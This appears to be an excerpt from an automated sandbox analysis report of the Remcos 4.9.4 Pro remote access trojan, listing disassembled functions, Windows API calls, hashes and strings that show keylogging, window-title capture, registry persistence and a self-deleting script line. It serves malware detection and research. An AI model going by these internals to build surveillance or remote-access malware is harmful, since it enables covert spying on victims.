                                                                                                                              • Opcode ID: 0d2b12d1838b1d8f75fe66e06ea844478a41fd83015ec53a71c610fba3ef7878
                                                                                                                              • Instruction ID: 2ce10be9f6c1c05b4dc350f7f0b84abc028627d1e72e34ed23a227f8834afd3a
                                                                                                                              • Opcode Fuzzy Hash: 0d2b12d1838b1d8f75fe66e06ea844478a41fd83015ec53a71c610fba3ef7878
                                                                                                                              • Instruction Fuzzy Hash: 2C412864B402067BF728BB79CC2A43DBB55EB51208B80025DD50707B49FE22B824CFEB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B5BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1017 46b5bdb-46b5c0b call 46b593e 1020 46b5c0d-46b5c18 call 46a05ca 1017->1020 1021 46b5c26-46b5c32 call 46b02f5 1017->1021 1026 46b5c1a-46b5c21 call 46a05dd 1020->1026 1027 46b5c4b-46b5c94 call 46b58a9 1021->1027 1028 46b5c34-46b5c49 call 46a05ca call 46a05dd 1021->1028 1038 46b5efd-46b5f03 1026->1038 1036 46b5d01-46b5d0a GetFileType 1027->1036 1037 46b5c96-46b5c9f 1027->1037 1028->1026 1042 46b5d0c-46b5d3d GetLastError call 46a05a7 CloseHandle 1036->1042 1043 46b5d53-46b5d56 1036->1043 1040 46b5ca1-46b5ca5 1037->1040 1041 46b5cd6-46b5cfc GetLastError call 46a05a7 1037->1041 1040->1041 1047 46b5ca7-46b5cd4 call 46b58a9 1040->1047 1041->1026 1042->1026 1054 46b5d43-46b5d4e call 46a05dd 1042->1054 1045 46b5d58-46b5d5d 1043->1045 1046 46b5d5f-46b5d65 1043->1046 1050 46b5d69-46b5db7 call 46b023e 1045->1050 1046->1050 1052 46b5d67 1046->1052 1047->1036 1047->1041 1060 46b5db9-46b5dc5 call 46b5aba 1050->1060 1061 46b5dc7-46b5deb call 46b565c 1050->1061 1052->1050 1054->1026 1060->1061 1068 46b5def-46b5df9 call 46abd6c 1060->1068 1066 46b5dfe-46b5e41 1061->1066 1067 46b5ded 1061->1067 1070 46b5e43-46b5e47 1066->1070 1071 46b5e62-46b5e70 1066->1071 1067->1068 1068->1038 1070->1071 1073 46b5e49-46b5e5d 1070->1073 1074 46b5efb 1071->1074 1075 46b5e76-46b5e7a 1071->1075 1073->1071 1074->1038 1075->1074 1076 46b5e7c-46b5eaf CloseHandle call 46b58a9 1075->1076 1079 46b5ee3-46b5ef7 1076->1079 1080 46b5eb1-46b5edd GetLastError call 46a05a7 call 46b0407 1076->1080 1079->1074 1080->1079
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046B58A9: CreateFileW.KERNEL32(00000000,00000000,?,046B5C84,?,?,00000000,?,046B5C84,00000000,0000000C), ref: 046B58C6
                                                                                                                              • GetLastError.KERNEL32 ref: 046B5CEF
                                                                                                                              • __dosmaperr.LIBCMT ref: 046B5CF6
                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 046B5D02
                                                                                                                              • GetLastError.KERNEL32 ref: 046B5D0C
                                                                                                                              • __dosmaperr.LIBCMT ref: 046B5D15
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 046B5D35
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 046B5E7F
                                                                                                                              • GetLastError.KERNEL32 ref: 046B5EB1
                                                                                                                              • __dosmaperr.LIBCMT ref: 046B5EB8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                              • Opcode ID: 49c57733bef8715d94be5a989a094574f54e5a6826ef444a78d7626bc1c011a0
                                                                                                                              • Instruction ID: add02b52d5ecb1afa3233718d3c51bf982667b7599f0f64eb4c8cec638076e6a
                                                                                                                              • Opcode Fuzzy Hash: 49c57733bef8715d94be5a989a094574f54e5a6826ef444a78d7626bc1c011a0
                                                                                                                              • Instruction Fuzzy Hash: B7A14632A14244AFDF199F68DC507EE3BA1EB06328F14015DE8529B3D0FB34AC96CB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0466AD38
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0466AD43
                                                                                                                              • GetForegroundWindow.USER32 ref: 0466AD49
                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0466AD52
                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0466AD86
                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0466AE54
                                                                                                                                • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                              • API String ID: 911427763-3954389425
                                                                                                                              • Opcode ID: 929d0a4f219145a97da8ea6690515e8a9225ceb3d1460ceb86870061d6e468fc
                                                                                                                              • Instruction ID: 2a8f11c8fa83e2ed56a384da58566745aa8fc05ca38039cf990cafba78dd30d9
                                                                                                                              • Opcode Fuzzy Hash: 929d0a4f219145a97da8ea6690515e8a9225ceb3d1460ceb86870061d6e468fc
                                                                                                                              • Instruction Fuzzy Hash: A051D3716083409BE714FB70D894ABEB7A5EF96708F40092DE447A2290FF74BD45C69A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0466DB9A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LongNamePath
                                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                              • API String ID: 82841172-425784914
                                                                                                                              • Opcode ID: a6e8b3741f5b6ad5a7e37e8f8b5c3e62a11784f55a84e672a89b2b1365945db3
                                                                                                                              • Instruction ID: f0af7bb1961a53c675665869d897b14028d98315b2472d39ba09e19091cf50b2
                                                                                                                              • Opcode Fuzzy Hash: a6e8b3741f5b6ad5a7e37e8f8b5c3e62a11784f55a84e672a89b2b1365945db3
                                                                                                                              • Instruction Fuzzy Hash: 4B410371248201ABE714FA60DC65CFFB7E8AF91719F10051EB45792190FF70BE49CA9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0467D476
                                                                                                                                • Part of subcall function 0467D50F: RegisterClassExA.USER32(00000030), ref: 0467D55B
                                                                                                                                • Part of subcall function 0467D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0467D576
                                                                                                                                • Part of subcall function 0467D50F: GetLastError.KERNEL32 ref: 0467D580
                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0467D4AD
                                                                                                                              • lstrcpynA.KERNEL32(046D4B60,Remcos,00000080), ref: 0467D4C7
                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,046D4B48), ref: 0467D4DD
                                                                                                                              • TranslateMessage.USER32(?), ref: 0467D4E9
                                                                                                                              • DispatchMessageA.USER32(?), ref: 0467D4F3
                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0467D500
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                              • String ID: Remcos
                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                              • Opcode ID: 1562d14e3249d66c63e03b22e5c03c33a72727c8b7450e49465057cc80478f39
                                                                                                                              • Instruction ID: f3bffb23e787a33bbf94782cf882dfea5320844ba4aa7c4888c7573331965b42
                                                                                                                              • Opcode Fuzzy Hash: 1562d14e3249d66c63e03b22e5c03c33a72727c8b7450e49465057cc80478f39
                                                                                                                              • Instruction Fuzzy Hash: 9E01FEB1941244ABD7109FA1EC4CFAABB7CEF95704F005019F65592190FA785C89CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • AllocConsole.KERNEL32(046D5338), ref: 0467CDA4
                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0467CDAA
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0467CDBD
                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0467CDE2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                                                              • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                                                                              • API String ID: 4067487056-3065609815
                                                                                                                              • Opcode ID: 6297b85ac35a0e7aa2eb0794e2f9f07e5e113a1bc58af84b22d9c2da2090465e
                                                                                                                              • Instruction ID: 7fcbc76ed4588f72921cc481cbf8a403d13e56c694d4dc5eccc2b7d0d880f6fc
                                                                                                                              • Opcode Fuzzy Hash: 6297b85ac35a0e7aa2eb0794e2f9f07e5e113a1bc58af84b22d9c2da2090465e
                                                                                                                              • Instruction Fuzzy Hash: 380184B19803086BEB10FBF09C4EF9D77ACDF15B05F500419B619A7181FAB4BD148BA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1307 467b2c3-467b31a call 467bfb7 call 46735a6 call 4661fe2 call 4661fd8 call 4666ae1 1318 467b35d-467b366 1307->1318 1319 467b31c-467b32b call 46735a6 1307->1319 1320 467b36f 1318->1320 1321 467b368-467b36d 1318->1321 1324 467b330-467b347 call 4661fab StrToIntA 1319->1324 1323 467b374-467b37f call 466537d 1320->1323 1321->1323 1329 467b355-467b358 call 4661fd8 1324->1329 1330 467b349-467b352 call 467cf69 1324->1330 1329->1318 1330->1329
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
                                                                                                                                • Part of subcall function 046735A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
                                                                                                                                • Part of subcall function 046735A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
                                                                                                                                • Part of subcall function 046735A6: RegCloseKey.KERNEL32(?), ref: 046735F2
                                                                                                                              • StrToIntA.SHLWAPI(00000000,046CC9F8,00000000,00000000,00000000,046D50E4,00000003,Exe,00000000,0000000E,00000000,046C60BC,00000003,00000000), ref: 0467B33C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                              • API String ID: 1866151309-2070987746
                                                                                                                              • Opcode ID: aed582f323855435f20150f4e420270d23191750d402484897a700460dcd3bc2
                                                                                                                              • Instruction ID: 36c18546fc31a83c3f664bb5516c360491ef29c484d3ecb39f36a143513f73c2
                                                                                                                              • Opcode Fuzzy Hash: aed582f323855435f20150f4e420270d23191750d402484897a700460dcd3bc2
                                                                                                                              • Instruction Fuzzy Hash: D9114870E012456BF704B778DC5AEBF7B58DB91A18F84012CE907A32D1FA647C86C7A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00001388), ref: 0466A740
                                                                                                                                • Part of subcall function 0466A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0466A74D), ref: 0466A6AB
                                                                                                                                • Part of subcall function 0466A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0466A74D), ref: 0466A6BA
                                                                                                                                • Part of subcall function 0466A675: Sleep.KERNEL32(00002710,?,?,?,0466A74D), ref: 0466A6E7
                                                                                                                                • Part of subcall function 0466A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0466A74D), ref: 0466A6EE
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0466A77C
                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0466A78D
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0466A7A4
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0466A81E
                                                                                                                                • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,046C6468,?,00000000,00000000,00000000,00000000,00000000), ref: 0466A927
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 110482706-0
                                                                                                                              • Opcode ID: 69b1da187e4c42a5d7e5a708c8ad5fdf1344eebbe4e0fff10c1242155eaec694
                                                                                                                              • Instruction ID: 94d92f54c0d042251093d4d6eb5ed03a7ffbfe8669731901651542b80d25327e
                                                                                                                              • Opcode Fuzzy Hash: 69b1da187e4c42a5d7e5a708c8ad5fdf1344eebbe4e0fff10c1242155eaec694
                                                                                                                              • Instruction Fuzzy Hash: 29515C716043046BFB18BB70C864AFE77AA9F9220DF00491DE543A72D1FF34B9498799
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0467D55B
                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0467D576
                                                                                                                              • GetLastError.KERNEL32 ref: 0467D580
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                              • Opcode ID: b5ca1d0d5f1ba2b7df886572cbd5b8248ae763f0c390b6729d12715444c1b87d
                                                                                                                              • Instruction ID: 6657797363d50e4970ccb4db6b642c06593088e181e433ee2acf7c9fbfebf8b5
                                                                                                                              • Opcode Fuzzy Hash: b5ca1d0d5f1ba2b7df886572cbd5b8248ae763f0c390b6729d12715444c1b87d
                                                                                                                              • Instruction Fuzzy Hash: 5401E9B1D10219ABEB11DFD5DC849EFBBBCEF04294B40052AF915A6240E67559458AA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0467CDED), ref: 0467CD62
                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0467CDED), ref: 0467CD6F
                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0467CDED), ref: 0467CD7C
                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0467CDED), ref: 0467CD8F
                                                                                                                              Strings
                                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0467CD82
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                              • API String ID: 3024135584-2418719853
                                                                                                                              • Opcode ID: 33233148c39ea8cada8b6fe18625ba89ae247b56ad7a9adf49a62e31632784b4
                                                                                                                              • Instruction ID: 56c67cfc13b8eabdb19946c3b2cf070ae32d4704b383069049182b8ee4111c8b
                                                                                                                              • Opcode Fuzzy Hash: 33233148c39ea8cada8b6fe18625ba89ae247b56ad7a9adf49a62e31632784b4
                                                                                                                              • Instruction Fuzzy Hash: 22E048B2500305A7D3102BB5AC4DCAB7B6CE745712F101255FB1691281F9645885D6F1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0467C44D
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0467C459
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0467C46A
                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 0467C477
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1087594267-0
                                                                                                                              • Opcode ID: 89c99874900ce96746281414027c1b783a4a9dfe019f3a263a9733a0e8f869ca
                                                                                                                              • Instruction ID: aa54240a97ac087281978e1c554adef861fa85aecae6972b08541895579411b2
                                                                                                                              • Opcode Fuzzy Hash: 89c99874900ce96746281414027c1b783a4a9dfe019f3a263a9733a0e8f869ca
                                                                                                                              • Instruction Fuzzy Hash: EF11FEB13843147FEB144E24AC89FBB739CEB46774F104629F692D22CCF625AC459671
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0466A27D,?,00000000,00000000), ref: 0466A1FE
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0466A20E
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0466A289,?,00000000,00000000), ref: 0466A21A
                                                                                                                                • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
                                                                                                                                • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                              • String ID: Offline Keylogger Started
                                                                                                                              • API String ID: 465354869-4114347211
                                                                                                                              • Opcode ID: 834f6d2eac655fd0766b19ef002fba91b2785b452ca03f28c652dbfacbdd7b68
                                                                                                                              • Instruction ID: 6705a7a45d6b3e566e364657f0e304c9b9867dc3ef8ce15d7dc7e1db4c8c13c5
                                                                                                                              • Opcode Fuzzy Hash: 834f6d2eac655fd0766b19ef002fba91b2785b452ca03f28c652dbfacbdd7b68
                                                                                                                              • Instruction Fuzzy Hash: DC11CAB16002187FA320BB75DC95CBF7A5CDE8259CB40051DF54712145FA617D14CEF6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(00000001,046D4EE0,046D5598,?,?,?,?,04675CD6,?,00000001), ref: 04664F81
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,046D4EE0,046D5598,?,?,?,?,04675CD6,?,00000001), ref: 04664FCD
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 04664FE0
                                                                                                                              Strings
                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 04664F94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                                              • Opcode ID: 06abae72f25b56d7881a531244b3f2dec8a81f4718bfcfd16719aa20d2a00598
                                                                                                                              • Instruction ID: d0b5c3c855e6c325b1930730337af0a1e6f288712176698522742d6543a1e0c9
                                                                                                                              • Opcode Fuzzy Hash: 06abae72f25b56d7881a531244b3f2dec8a81f4718bfcfd16719aa20d2a00598
                                                                                                                              • Instruction Fuzzy Hash: 5011A3719042847AE720AA76980DEAB7FA8DBD7714F04014EE54353244FAB4B445CBA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0467377E
                                                                                                                              • RegSetValueExA.KERNEL32(?,046C74B8,00000000,?,00000000,00000000,046D52F0,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737A6
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 1818849710-4028850238
                                                                                                                              • Opcode ID: d39b6c6e49843726d9a4cd3068790dfe1710cfb0d7b1e8cf13efa9431e1361e4
                                                                                                                              • Instruction ID: 78a3684d50dca713a13d3db33d9497ea3504ead5b8181445e9218afcc8f6a309
                                                                                                                              • Opcode Fuzzy Hash: d39b6c6e49843726d9a4cd3068790dfe1710cfb0d7b1e8cf13efa9431e1361e4
                                                                                                                              • Instruction Fuzzy Hash: C6F06DB2500118FBDB00AFA0DC45EEA3B7CEF05650F108258FE06A6250FB35AE58EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,046D4F50), ref: 04664DB3
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,046D4EF8,00000000,00000000), ref: 04664DC7
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 04664DD2
                                                                                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000000), ref: 04664DDB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579639479-0
                                                                                                                              • Opcode ID: 594039e39c0eb9f9cdd132cdc580df54091e31e6997f78c5ccbcef496ef24b98
                                                                                                                              • Instruction ID: bfbd51c031eafc1822e74e8fd09cbf95c944fcd23f02d3ad84fcb04c29f1ef11
